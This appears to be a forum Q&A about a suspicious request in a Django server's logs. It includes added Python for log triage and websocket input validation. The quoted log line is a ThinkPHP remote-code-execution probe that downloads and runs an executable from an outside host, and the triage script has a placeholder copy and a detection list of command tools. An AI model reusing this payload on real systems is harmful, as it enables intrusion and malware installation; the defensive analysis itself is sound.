Concerning GET request in logs
I have a Django application running on a Digital Ocean Ubuntu server. I am using NGINX and Daphne to serve the application because I am using Django Channels.
My websockets keep crashing, and I noticed in the logs when the crash occurs, this message:
127.0.0.1:46138 - - [11/May/2021:14:03:33] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars=system&vars=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/nagagewrehutkiz561.exe');start%20%SystemRoot%/Temp/nagagewrehutkiz561.exe" 404 2111
It looks very suspicious to me, but my knowledge of security is minimal. Can anyone help me determine if this is something I should be concerned about?
It is a GET request that I did not submit (nobody else is using this server currently), but perhaps it is something automatically submitted by my browser?
Can anyone help me determine if this is something I should be concerned about?
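As an added example (not part of the question or the answer), here is a small Python triage script that parses access-log lines in the shape shown above, percent-decodes the request target and flags the markers that make a line look like an automated exploit probe rather than browser traffic. The three sample log lines are constructed: the first mirrors the structure of the request in the question but uses placeholder host and file names, the other two are ordinary websocket-upgrade and page requests.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# Constructed sample lines (not real traffic). Line 1 has the shape of the probe
# in the question with placeholder host/file names; lines 2 and 3 are benign.
SAMPLE_LOG = """\
127.0.0.1:46138 - - [11/May/2021:14:03:33] "GET /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars=system&vars=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://example.invalid/download.exe','%SystemRoot%/Temp/payload.exe');start%20%SystemRoot%/Temp/payload.exe" 404 2111
127.0.0.1:46140 - - [11/May/2021:14:03:40] "GET /ws/chat/room1/ HTTP/1.1" 101 0
127.0.0.1:46141 - - [11/May/2021:14:03:41] "GET /about/ HTTP/1.1" 200 5120
"""

# client - user [time] "METHOD target [HTTP/x.y]" status bytes
# The protocol token is optional because the line in the question lacks it.
LINE_RE = re.compile(
    r'^(?P<client>\S+) - (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\d+)'
)

# Substrings that practically never appear in legitimate requests to a Django
# site: PHP framework function-invocation parameters and OS command fragments.
PROBE_MARKERS = (
    "invokefunction", "call_user_func_array", "cmd.exe", "powershell",
    "downloadfile(", "%systemroot%", "/bin/sh", "wget ", "curl ",
)

# Extensions a Django/Daphne deployment does not serve; a request for one of
# these is scanning for some other stack (the server answered 404 in the question).
FOREIGN_EXTENSIONS = (".php", ".asp", ".aspx", ".cgi")


@dataclass
class Triage:
    client: str
    target: str
    status: int
    markers: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.markers)

    @property
    def served_content(self) -> bool:
        """True when the server actually handled the request (2xx/3xx)."""
        return 200 <= self.status < 400


def triage_line(line: str):
    """Parse one log line; return a Triage or None if the line is not parseable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    target = m.group("target")
    decoded = unquote(target).lower()          # %20 -> space etc., case-folded
    markers = [mk for mk in PROBE_MARKERS if mk in decoded]
    path = decoded.split("?", 1)[0]
    if path.endswith(FOREIGN_EXTENSIONS):
        markers.append("foreign_extension:" + path.rsplit(".", 1)[-1])
    return Triage(m.group("client"), target, int(m.group("status")), markers)


def triage_log(text: str) -> list:
    """Triage every parseable line in a log fragment."""
    results = []
    for line in text.splitlines():
        t = triage_line(line)
        if t is not None:
            results.append(t)
    return results


def summarize(results: list) -> dict:
    """Counts a defender wants first: how many probes, and did any get a 2xx/3xx."""
    probes = [r for r in results if r.suspicious]
    return {
        "lines": len(results),
        "probes": len(probes),
        "probes_served": sum(1 for r in probes if r.served_content),
    }


if __name__ == "__main__":
    rs = triage_log(SAMPLE_LOG)
    for r in rs:
        flag = "PROBE " if r.suspicious else "ok    "
        print(f"{flag}{r.status} {r.client} {r.target[:60]} {r.markers}")
    print(summarize(rs))
```

The `probes_served` counter is the one to watch: a probe that gets a 404, as in the question, hit nothing, while a probe answered with 2xx means the server actually processed a request it should never have seen.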
Someone is trying to exploit a vulnerability on your server. References to %SystemRoot% indicate this exploit is intended for a Windows server.
It shows your server returning HTTP 404, with 2111 bytes in the response (those last 2 values in your log). That means your server does not have the vulnerable /public/index.php file, so no damage was done in this case.
Your websocket probably is dying because you aren't properly processing unexpected input, and this is a MASSIVE SECURITY ISSUE (bold capitals because I cannot use blinking red text font). Failing to detect malformed input and reacting to that is the source of countless exploits.
If you don't know much about security, you can be sure that your server will be hacked sooner or later. Take your server offline, install a Linux VM on your desktop, and train on your VM first. Read articles on Linux hardening, on securing Nginx and Django, on secure coding. Your server can be a threat to anyone on the internet as soon as someone hacks it and turns it into a hacking platform to launch attacks.
nobody else is using this server currently
As soon as your server is reachable from the internet, that statement is not true anymore.
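As an added example (not part of the answer, and not Django Channels' own code), the following Python shows the pattern the answer is warning about beside its hardened form. `naive_handle` does what many first websocket consumers do: it trusts that every frame is well-formed JSON with the expected keys, so any malformed frame raises and an uncaught exception inside a consumer's `receive()` closes the connection. `handle_frame` validates size, JSON shape, field types and an action allow-list, and always returns a reply instead of raising. The frame format (`action`, `room`, `text`) and the limits are assumptions for the illustration.

```python
import json
import re

# Assumed protocol limits and schema for the illustration.
MAX_FRAME_BYTES = 4096
ALLOWED_ACTIONS = {"join", "message", "leave"}
ROOM_RE = re.compile(r"^[a-z0-9_-]{1,32}$")
MAX_TEXT_LEN = 1000


class ProtocolError(Exception):
    """Raised for any frame that does not match the expected schema."""


def naive_handle(raw: str) -> dict:
    """The fragile pattern: assumes every frame is valid JSON with the keys we expect.
    Non-JSON text -> ValueError; a JSON list -> TypeError; a missing key -> KeyError.
    Inside a consumer's receive() any of these kills the socket."""
    data = json.loads(raw)
    return {"action": data["action"], "room": data["room"]}


def naive_crashes(raw: str) -> bool:
    """Report whether naive_handle would raise on this frame (used for comparison)."""
    try:
        naive_handle(raw)
    except Exception:
        return True
    return False


def parse_frame(raw) -> dict:
    """Validate one text frame and return a normalised message, or raise ProtocolError."""
    if not isinstance(raw, str):
        raise ProtocolError("binary frames are not accepted")
    if len(raw.encode("utf-8")) > MAX_FRAME_BYTES:
        raise ProtocolError("frame too large")
    try:
        data = json.loads(raw)
    except ValueError:
        raise ProtocolError("frame is not valid JSON")
    if not isinstance(data, dict):
        raise ProtocolError("frame must be a JSON object")
    action = data.get("action")
    if action not in ALLOWED_ACTIONS:
        raise ProtocolError("unknown action")
    room = data.get("room")
    if not isinstance(room, str) or not ROOM_RE.fullmatch(room):
        raise ProtocolError("invalid room name")
    text = data.get("text", "")
    if not isinstance(text, str) or len(text) > MAX_TEXT_LEN:
        raise ProtocolError("invalid text field")
    if action == "message" and not text:
        raise ProtocolError("message requires text")
    return {"action": action, "room": room, "text": text}


def handle_frame(raw) -> dict:
    """Never raises: returns the reply the consumer should send back to the client.
    Malformed input gets a short error reply; nothing about the server leaks."""
    try:
        msg = parse_frame(raw)
    except ProtocolError as exc:
        return {"ok": False, "error": str(exc)}
    return {"ok": True, "accepted": msg}


if __name__ == "__main__":
    # Constructed frames: one valid, then the kinds of junk a scanner or a buggy client sends.
    for frame in ['{"action":"join","room":"lobby"}', "not json", "[1,2,3]",
                  "{}", '{"action":"shell","room":"x"}', "x" * (MAX_FRAME_BYTES + 1)]:
        print(f"naive crashes={naive_crashes(frame)!s:5}  hardened -> {handle_frame(frame)}")
```

In a Channels `JsonWebsocketConsumer` you would call `handle_frame` from `receive()` and pass its result to `send_json`; the point is that every path out of `receive()` is a reply or a deliberate `close()`, never an unhandled exception.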